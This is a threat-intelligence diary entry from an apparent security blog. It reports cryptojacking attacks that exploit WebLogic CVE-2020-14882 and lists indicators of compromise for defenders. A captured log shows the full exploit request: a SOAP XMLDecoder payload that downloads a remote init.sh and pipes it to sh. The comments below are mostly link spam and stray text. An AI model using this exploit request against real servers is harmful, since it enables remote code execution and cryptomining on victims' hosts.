Cryptojacking Targeting WebLogic TCP/7001
This past week got some interesting logs targeting TCP/7001 (WebLogic CVE-2020-14882 - see previous diary[1][2]) looking to download and launch a shell script to install various cryptominer on the target. The shell script target SELINUX compatible hosts likely CentOS/RedHat, Ubuntu, etc to install various cryptominer applications.
If successful, the script installs a SSH authorized_key (see below) in the root account to provide access to the host after it has been compromised. If using WebLogic, the current advisory for CVE-2020-14882 is published here.
Log Example
20201106-073608: 192.168.25.9:7001-223.240.104.222:60620 data 'POST /wls-wsat/CoordinatorPortType11 HTTP/1.1\r\nHost: XX.XX.122.14:7001\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)\r\nContent-Length: 611\r\nConnection: close\r\nContent-Type: text/xml\r\nAccept-Encoding: gzip\r\n\r\n<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>cd1 -fsSL http://45.9.148[.]37/b2f628fff19fda999999999/init.sh |sh</string> </void> </array> <void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
Indicator of compromise
MD5
3112fb090700ed03755ffc84f552080a init.sh
02e43830f8b1528c1aed200828f78e2d config.json
3112fb090700ed03755ffc84f552080a newsvc.sh
36971b02377bda17e29c75cd6194ebad svcguard
149c79bf71a54ec41f6793819682f790 svcupdate
8ef6437f966f1cc7c78f443a17968a10 svcworkmanager
SHA256
bdd467bce95969caeb5963ba817036e0123253a992ad5a0f4815c7e980bcfb10 init.sh and newsvc.sh
29996267aba0bd7739037639b857dcefff8b5d7c79f54780e9cbf607979f7eba config.json
e38c1f4eef131aa74fad40ea39d95ef298e39f6c6690ac6b9eac77307f535056 svcguard
e7446d595854b6bac01420378176d1193070ef776788af12300eb77e0a397bf7 svcupdate
d3466a191b5185a4007faf8949117df5c77907eea9121c7e8308f2a5a736b3fc svcworkmanager
Initial Download
http://45.9.148[.]37/b2f628fff19fda999999999/init.sh
http://45.9.148[.]37/E5DB0E07C3D7BE80V201007/init.sh
http://global.bitmex.com[.]de/b2f627fff19fda/init.sh
http://185.181.10[.]234/E5DB0E07C3D7BE80V520/init.sh
File Download
http://103.125.218[.]107/b2f628/newsvc.sh"
http://45.9.148[.]37/b2f628fff19fda999999999/newsvc.sh"
http://103.125.218[.]107/b2f628/config.json"
http://45.9.148[.]37/b2f628fff19fda999999999/config.json"
http://103.125.218[.]107/b2f628/svcworkmanager"
http://45.9.148[.]37/b2f628fff19fda999999999/svcworkmanager"
http://103.125.218[.]107/b2f628/svcguard"
http://45.9.148[.]37/b2f628fff19fda999999999/svcguard"
http://update.aegis.aliyun[.]com/download/uninstall.sh
http://update.aegis.aliyun[.]com/download/quartz_uninstall.sh
Currently Unavailable
http://103.125.218[.]107/b2f628/iplog.php
http://45.9.148[.]37/b2f628fff19fda999999999/iplog.php
http://103.125.218[.]107/b2f628/iplog.php
http://45.9.148[.]37/b2f628fff19fda999999999/iplog.php
Bitcoin Mining Pool
xmr.f2pool[.]com:13531
xmr-eu2.nanopool[.]org:14444
randomxmonero.hk.nicehash[.]com:3380
User ID in config.json
"user": "43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.vsyd"
SSH authorized_keys
"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfg
O06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfs
xXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17"
[1] https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/
[2] https://isc.sans.edu/forums/diary/Attackers+Exploiting+WebLogic+Servers+via+CVE202014882+to+install+Cobalt+Strike/26752/
[3] https://www.virustotal.com/gui/file/bdd467bce95969caeb5963ba817036e0123253a992ad5a0f4815c7e980bcfb10/detection
[4] https://www.virustotal.com/gui/file/29996267aba0bd7739037639b857dcefff8b5d7c79f54780e9cbf607979f7eba/detection
[5] https://www.virustotal.com/gui/file/e38c1f4eef131aa74fad40ea39d95ef298e39f6c6690ac6b9eac77307f535056/detection
[6] https://www.virustotal.com/gui/file/e7446d595854b6bac01420378176d1193070ef776788af12300eb77e0a397bf7/detection
[7] https://www.virustotal.com/gui/file/d3466a191b5185a4007faf8949117df5c77907eea9121c7e8308f2a5a736b3fc/detection
[8] https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Coinminer.Linux.MALXMR.UWEJJ
[9] https://www.oracle.com/security-alerts/alert-cve-2020-14750.html#AppendixFMWl
-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
Comments
Anonymous
Dec 3rd 2022
9 months ago
Anonymous
Dec 3rd 2022
9 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
https://defineprogramming.com/
Dec 26th 2022
9 months ago
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
https://defineprogramming.com/
Dec 26th 2022
9 months ago
rthrth
Jan 2nd 2023
8 months ago